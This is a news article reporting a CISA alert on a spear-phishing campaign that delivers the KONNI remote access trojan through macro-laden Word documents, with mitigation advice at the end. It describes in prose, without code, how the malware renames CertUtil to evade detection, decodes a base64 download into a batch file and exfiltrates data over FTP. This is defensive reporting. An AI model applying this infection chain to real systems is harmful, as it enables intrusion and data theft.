CISA Alerts to Phishing Campaign Deploying KONNI RAT Malware

August 19, 2020 - Hackers are using a phishing campaign to deploy KONNI malware, a remote access trojan (RAT), via Microsoft Word documents containing malicious Visual Basic Application (VBA) macro code, according to a recent Department of Homeland Security Cybersecurity and Infrastructure alert. 

First observed in 2014, the malware has been linked to several campaigns tied to North Korea. There are also signficant links in code with the NOKKI malware family and some evidence that links KONNI to the APT37 hacking group. 

KONNI is typically delivered through spear-phishing campaigns, which are highly targeted and personal in comparison to traditional phishing attacks that focus more on volume. The targeted nature of the attack makes it difficult for even the most tech-savvy user to detect. 

According to the alert, KONNI’s malicious code can change the font color from light grey to black, in order to dupe the potential victim into enabling the contents of the malicious email. 

The code is also able to determine if the Windows operating system is a 32-bit or 64-bit version, while constructing and executing the command line to download additional files.

A successful KONNI deployment could enable a hacker to steal data, capture keystrokes, take screenshots, and launch malicious, arbitrary code. 

“Once the VBA macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator,” CISA officials explained. “It also incorporates a built-in function to decode base64-encoded files.” 

“The Command Prompt silently copies certutil.exe into a temp directory and renames it to evade detection,” they added. “The cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.” 

KONNI is also able to collect the internet protocol address and usernames, delete files, create shortcuts to masquerade as legitimate files, and gather architecture data, connected drives, hostname, and computer name from the victim’s machine. 

The malware has also been observed using the File Transfer Protocol to exfiltrate reconnaissance data from the victim’s system. 

Notably, one version of KONNI can search for filenames created from previous versions of the malware, which suggests the hackers target the same victims – and that the versions may work together, according to MITRE. 

The CISA alert provides administrators with detection signatures, as well as mitigation methods. Organizations are encouraged to follow best practices to strengthen their cyber posture, including maintaining up-to-date anti-virus signatures and engines. 

Patch management is crucial to preventing exploit through vulnerable systems, while file and printer sharing services should be disabled or protected with strong passwords or Active Directory authentication. 

User permissions should be restricted from installing and running unwanted software and should not be added to the local administrators group unless its required for their role. Administrators must also ensure all software downloaded from the internet and email attachments are scanned prior to opening. 

Hackers have increasingly leveraged phishing attacks in recent months, with CISA recently alerting to a campaign designed to spoof the COVID-19 loan relief website. Researchers have also seen an increase in business email compromise phishing campaigns able to bypass multi-factor authentication and another scam targeting Microsoft Office 365 executive accounts. 

Healthcare organizations should review spear-phishing insights from Microsoft to better understand the attack method and prevention techniques.